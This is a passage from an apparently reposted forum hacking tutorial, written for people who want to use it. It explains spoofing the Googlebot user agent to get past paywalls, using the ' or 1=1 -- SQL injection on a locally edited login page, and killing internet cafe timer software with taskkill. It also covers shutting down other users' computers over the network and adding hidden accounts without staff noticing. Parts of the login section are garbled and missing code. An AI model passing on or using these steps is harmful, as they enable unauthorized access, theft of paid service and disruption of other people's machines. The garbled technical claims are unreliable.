-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.

Hacking Websites

If you posses the HTML & JAVA knowledge then u can even access password protected websites.

To hack a Password Protected Websites just follow these steps: -

* Open the website u want to hack. Provide wrong username-password.
(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
your work starts from here...

* Right click anywhere on that page =>> go to view source.

* There u can see the html coding with java scripts.

* Before this login information copy the url
of the site in which you are.


* Then delete the java script from the above that validates your
information in the server.(Do this very carefully, your success to
hack the site depends upon this i.e. how efficiently u delete the
JavaScript’s that validate your account information)



then look for...code ..: input name="password" type="password"
=> replace
there instead of . See there if
max length of password is less than 11 then increase it to 11
(e.g. : if then write

* Just go to file => save as and save it any where within
the hard disk with ext.html(e.g. :c:hack.htm)

* Close your webpage and go to the webpage u save in your
hard disk(e.g : c:hack.htm) Open it.

* U see that some changes in current page as compared to original
One. Don't worry.

* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats! Your have cracked the above website and entered into the
account of Ist user saved in the server's database.

The above trick doesn't work on the websites using latest
technique to protect there servers

Hacking internet Cafe

Basic overview of this tutorial is if there's some kind of timer or client
software on the computer you're using at the Net Cafe you can hopefully disable it.

Firstly we need to gain access to command prompt (cmd.exe) to do this there's a few
ways.

1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.
Say that's disabled then we can try some other methods.

2) Press the Windows Logo + R and it will start run up. (hopefully)

3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.

4) Open notepad type "cmd.exe" without the quotation marks ("") and then
go to File/Save As.. and type the name for the file and have it end with
.bat for example "MyNewFile.bat" and select Save as type and select All Files.

Make sure to save it somewhere you can access it, Like the desktop.

If they have deleted Notepad then go in to Internet Explorer and right click
and select View Source or on the menu bar click View then source and perform the
same process as above.

Once you have done this you can run the file. If you can't open files from the desktop
then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to
the Desktop and it will show the saves files on the desktop in a folder type window.


Once you have access to command prompt you can perform some usefull actions e.g shutdown
programs, shutdown other peoples computers, add new accounts.

Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.



For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.


Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.


Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.



Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in
handy)

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.

PS This wasn't written by me. I'm just sharing it. All due credit goes to the original poster.